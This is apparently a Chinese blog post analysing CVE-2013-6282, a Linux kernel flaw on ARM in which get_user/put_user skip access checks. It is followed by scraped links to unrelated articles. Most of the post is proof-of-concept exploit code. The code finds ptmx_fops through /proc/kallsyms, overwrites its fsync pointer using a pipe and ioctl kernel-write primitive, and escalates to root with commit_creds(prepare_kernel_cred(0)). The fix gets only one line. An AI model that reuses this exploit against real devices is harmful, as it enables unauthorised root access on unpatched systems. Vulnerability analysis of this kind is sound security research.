Missing access checks in put_user/get_user kernel API (CVE-2013-6282)
/*
本文章由 莫灰灰 编写,转载请注明出处。
作者:莫灰灰 邮箱: minzhenfei@163.com
*/
1.漏洞成因
Linux kernel对ARM上的get_user/put_user缺少訪问权限检查,本地攻击者可利用此漏洞读写内核内存,获取权限提升。
2.受影响的系统
Linux kernel 3.2.2
Linux kernel 3.2.13
Linux kernel 3.2.1
3.PoC分析
(1)从/proc/kallsyms文件里获得数据结构ptmx_fops的地址
void *ptmx_fops = kallsyms_get_symbol_address("ptmx_fops");
unsigned int ptmx_fops_fsync_address = (unsigned int)ptmx_fops + 0x38;
static void *kallsyms_get_symbol_address(const char *symbol_name)
{
FILE *fp;
char function[BUFSIZ];
char symbol;
void *address;
int ret; fp = fopen("/proc/kallsyms", "r");
if (!fp) {
printf("Failed to open /proc/kallsyms due to %s.", strerror(errno));
return 0;
} while(!feof(fp)) {
ret = fscanf(fp, "%p %c %s", &address, &symbol, function);
if (ret != 3) {
break;
} if (!strcmp(function, symbol_name)) {
fclose(fp);
return address;
}
}
fclose(fp); return NULL;
}
(2)找到fsync的地址,即ptmx_fops+0x38的地方
static struct file_operations ptmx_fops;
struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
int (*iterate) (struct file *, struct dir_context *);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
int (*flush) (struct file *, fl_owner_t id);
int (*release) (struct inode *, struct file *);
int (*fsync) (struct file *, loff_t, loff_t, int datasync);
int (*aio_fsync) (struct kiocb *, int datasync);
<span style="color:#ff0000;"><strong>int (*fasync) (int, struct file *, int);</strong></span>
int (*lock) (struct file *, int, struct file_lock *);
ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
int (*check_flags)(int);
int (*flock) (struct file *, int, struct file_lock *);
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
int (*setlease)(struct file *, long, struct file_lock **);
long (*fallocate)(struct file *file, int mode, loff_t offset,
loff_t len);
int (*show_fdinfo)(struct seq_file *m, struct file *f);
};
(3)替换fsync函数指针为自己的函数
if(pipe_write_value_at_address( ptmx_fops_fsync_address,(unsigned int)&ptmx_fsync_callback )){
ptmx_fsync_callback函数能够使本进程得到权限提升
/* obtain_root_privilege - userland callback function
We set ptmx_fops.fsync to the address of this function
Calling fysnc on the open /dev/ptmx file descriptor will result
in this function being called in the kernel context
We can the call the prepare/commit creds combo to escalate the
processes priveledge.
*/
static void ptmx_fsync_callback(void)
{
commit_creds(prepare_kernel_cred(0));
}
pipe_write_value_at_address函数底层通过put_user函数改写内核地址内容
static unsigned int pipe_write_value_at_address(unsigned long address, unsigned int value)
{
char data[4];
int pipefd[2];
int i; *(long *)&data = value; if (pipe(pipefd) == -1) {
perror("pipe");
return 1;
} for (i = 0; i < (int) sizeof(data) ; i++) {
char buf[256];
buf[0] = 0;
if (data[i]) {
if (write(pipefd[1], buf, data[i]) != data[i]) {
printf("error in write().\n");
break;
}
} if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {
perror("ioctl");
break;
} if (data[i]) {
if (read(pipefd[0], buf, sizeof buf) != data[i]) {
printf("error in read().\n");
break;
}
}
} close(pipefd[0]);
close(pipefd[1]); return (i == sizeof (data));
}
(4)手动调用fsync函数,触发自己的hook函数,得到权限提升
int fd = open(PTMX_DEVICE, O_WRONLY);
if(!fd) return 1;
fsync(fd);
close(fd);
4.修复
在put_user之前加了个地址推断
Missing access checks in put_user/get_user kernel API (CVE-2013-6282)的更多相关文章
- linux kernel API and google android compile guide
(1)linux kernel API website: http://docs.knobbits.org/local/linux-doc/html/regulator/index.html http ...
- Access Toke调用受保护的API
ASP.NET Web API与Owin OAuth:使用Access Toke调用受保护的API 在前一篇博文中,我们使用OAuth的Client Credential Grant授权方式,在服务端 ...
- ASP.NET Web API与Owin OAuth:使用Access Toke调用受保护的API
在前一篇博文中,我们使用OAuth的Client Credential Grant授权方式,在服务端通过CNBlogsAuthorizationServerProvider(Authorization ...
- Linux kernel API的查看
一般来说Linux上查看一些函数API的说明咱们可以man一下.man 2是syscall,man 3是一些库的函数API. 以下是man sections的一些说明 The table below ...
- Linux Kernel API
记录一些Linux Device Drivers中常用的API. Linux官方提供的内核文档: 1. 最新版: https://www.kernel.org/doc/html/latest/ 2. ...
- shell定时统计Nginx下access.log的PV并发送给API保存到数据库
1,统计PV和IP 统计当天的PV(Page View) cat access.log | sed -n /`date "+%d\/%b\/%Y"`/p |wc -l 统计某一天的 ...
- How to exploit the x32 recvmmsg() kernel vulnerability CVE 2014-0038
http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html ...
- facebook api之Access Tokens
Access Tokens When someone connects with an app using Facebook Login and approves the reqest for per ...
- 使用Flask设计带认证token的RESTful API接口[翻译]
上一篇文章, 使用python的Flask实现一个RESTful API服务器端 简单地演示了Flask实的现的api服务器,里面提到了因为无状态的原则,没有session cookies,如果访问 ...
随机推荐
- ECSHOP - 二次开发指南---购物车篇
第一个问题 保存用户购物车数据ECSHOP的购物车数据,是以Session 方式存储在数据库里,并在Session结束后 ,Distroy 掉,解决方法是: 1.购物车内容读取方式. 更改登陆后购物车 ...
- hdu 4081 Qin Shi Huang's National Road System(最小生成树+dp)2011 Asia Beijing Regional Contest
同样是看别人题解才明白的 题目大意—— 话说秦始皇统一六国之后,打算修路.他要用n-1条路,将n个城市连接起来,并且使这n-1条路的距离之和最短.最小生成树是不是?不对,还有呢.接着,一个自称徐福的游 ...
- 《Python CookBook2》 第一章 文本 - 改变多行文本字符串的缩进 && 扩展和压缩制表符(此节内容待定)
改变多行文本字符串的缩进 任务: 有个包含多行文本的字符串,需要创建该字符串的一个拷贝.并在每行行首添加或者删除一些空格,以保证每行的缩进都是指定数目的空格数. 解决方案: # -*- coding: ...
- 将webkit内核封装为duilib的浏览器控件
转载请说明出处,谢谢~~ 原本的duilib是自带浏览器控件的,但是使用了IE内核,我在做仿酷狗音乐播放器时,在右侧乐库要用到浏览器控件,而我使用自带的IE控件却发现了不少缺点,这也是duilib一直 ...
- asp.net如何将DataSet转换成josn并输出
public class JsonUtil { public string ToJson(DataSet dataSet) { string jsonString = "{"; f ...
- [CODEVS2603]公路修建
题目描述 某国有n个城市,它们互相之间没有公路相通,因此交通十分不便.为解决这一“行路难”的问题,政府决定修建公路.修建公路的任务由各城市共同完成. 修建工程分若干轮完成.在每一轮中,每个城市选 ...
- css水平居中和垂直居中
水平居中:内联元素:text-align:center;相对于父级居中显示块级元素:margin:0 auto;但是需要同时width,否则无法看到效果多个块级元素居中:在此想要探讨一下display ...
- Tkinter教程之Text(2)篇
本文转载自:http://blog.csdn.net/jcodeer/article/details/1811347 '''Tkinter教程之Text(2)篇''''''6.使用tag来指定文本的属 ...
- Varnish – 高性能http加速器
Varnish是一款高性能且开源的反向代理服务器和http加速器.与传统的Squid相比,Varnish具有性能更高.速度更快.管理更方便 等诸多优点.作者Poul-Henning Kamp是Free ...
- Java常用命令行工具
命令基于Sun JDK,用于监控和诊断HotSpot的java 虚拟机. 对应的可执行文件位于$JAVA_HOME/bin/下 jps-虚拟机进程状况工具 选项 作用 -q 只输出LVMID,同进程p ...